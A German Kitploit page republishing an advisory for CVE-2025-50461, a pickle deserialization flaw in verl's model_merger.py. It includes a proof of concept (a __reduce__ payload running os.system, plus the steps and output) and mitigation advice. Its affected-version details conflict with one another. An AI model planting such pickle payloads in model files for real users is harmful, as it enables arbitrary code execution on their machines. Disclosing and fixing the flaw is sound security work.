Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50461 — Technical Details and Exploit for CVE-2025-50461 | Kitploit
Tools/GitHubGitHub/anchor0221/cve-2025-50461
Payload GenerationVulnerability AnalysisExploitationPapers & ResearchLearning & EducationBinary Exploitation
GitHubanchor0221/cve-2025-50461

CVE-2025-50461

Technical Details and Exploit for CVE-2025-50461

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-50461: Remote Code Execution durch unsichere Modell-Deserialisierung in Verl

Status: RESERVIERT
Diese CVE-ID wurde vergeben, ist aber noch nicht in der offiziellen CVE-Liste veröffentlicht.

Eine Deserialisierungsschwachstelle besteht in Volcengine's verl 3.0.0, speziell im Skript scripts/model_merger.py bei Verwendung des „fsdp“-Backends. Das Skript ruft torch.load() mit weights_only=False auf benutzerbereitgestellten .pt-Dateien auf, was es Angreifern ermöglicht, beliebigen Code auszuführen, wenn eine böswillig erstellte Modelldatei geladen wird. Ein Angreifer kann dies ausnutzen, indem er ein Opfer dazu bringt, eine böswillige Modelldatei mit einem bestimmten Dateinamenmuster in ein lokales Verzeichnis herunterzuladen und dort abzulegen. Diese Schwachstelle kann zur Ausführung beliebigen Codes mit den Berechtigungen des Benutzers führen, der das Skript ausführt.

Beschreibung

Betroffenes Repository

  • Projekt: volcengine/verl
  • Betroffene Versionen: <= v0.4.0
  • Datei: scripts/model_merger.py
  • GitHub Permalink: https://github.com/volcengine/verl/blob/v0.3.0.post1/scripts/model_merger.py#L87
  • Abhängigkeit: PyTorch < 2.6.0

Proof of Concept (PoC)

Schritt 1: Erstellen einer bösartigen Modelldatei (malicious.pt)

root@kitploit:~
import pickle
import os

class Malicious:
    def __reduce__(self):
        return (os.system, ("mkdir HACKED!",))

with open("malicious.pt", "wb") as f:
    pickle.dump(Malicious(), f)

Schritt 2: Umbenennen und Ablegen

root@kitploit:~
mv malicious.pt model_world_size_4_rank_0.pt
mkdir TESTS
mv model_world_size_4_rank_0.pt TESTS/

Schritt 3: Ausführen des verwundbaren Skripts

root@kitploit:~
python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"

Ergebnis

root@kitploit:~
root@99137c7690ee:/workspace/verl-main# python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"
Traceback (most recent call last):
  File "/workspace/verl-main/scripts/model_merger.py", line 440, in <module>
    convert_fsdp_checkpoints_to_hfmodels()
  File "/workspace/verl-main/scripts/model_merger.py", line 88, in convert_fsdp_checkpoints_to_hfmodels
    state_dict = torch.load(os.path.join(local_dir, f'model_world_size_{world_size}_rank_{rank}.pt'),
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1384, in load
    return _legacy_load(
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1630, in _legacy_load
    raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
root@99137c7690ee:/workspace/verl-main# ls
'HACKED!'   Notice.txt   TESTS   docker   examples   outputs   pyproject.toml       requirements.txt          scripts    test_prime.sh   tmp    verl.egg-info
 LICENSE    README.md    data    docs     patches    recipe    requirements_sglang.txt   setup.py   tests           verl   verl_demo.log

Der Befehl mkdir HACKED! wird auf dem System des Opfers ausgeführt.

Abhilfemaßnahmen

  • Upgrade auf PyTorch Version 2.6.0 oder höher, die standardmäßig weights_only=True verwendet, wodurch Deserialisierungsrisiken verringert werden.
  • Code anpassen, um beim Aufruf von torch.load explizit weights_only=True zu setzen.
  • Validierung implementieren, um die Integrität der Modelldatei vor dem Laden zu überprüfen.
  • Benutzer schulen, keine Modelle aus nicht vertrauenswürdigen Quellen zu laden.

Beispiel für sicheres Laden:

root@kitploit:~
state_dict = torch.load(path, map_location="cpu", weights_only=True)

CVE-Status

Autor

  • Entdeckt von: Yu Rong (戎誉) und Hao Fan (凡浩)
  • Kontakt: [[email protected]]
Tool herunterladen
FeldWert
CVE-IDCVE-2025-50461
CVSS-ScoreTBD
CWECWE-502: Deserialisierung nicht vertrauenswürdiger Daten
Meldedatum2025-04-30
Offenlegungsdatum2025-08-15
Betroffene Version<= v0.4.0
Fix-Version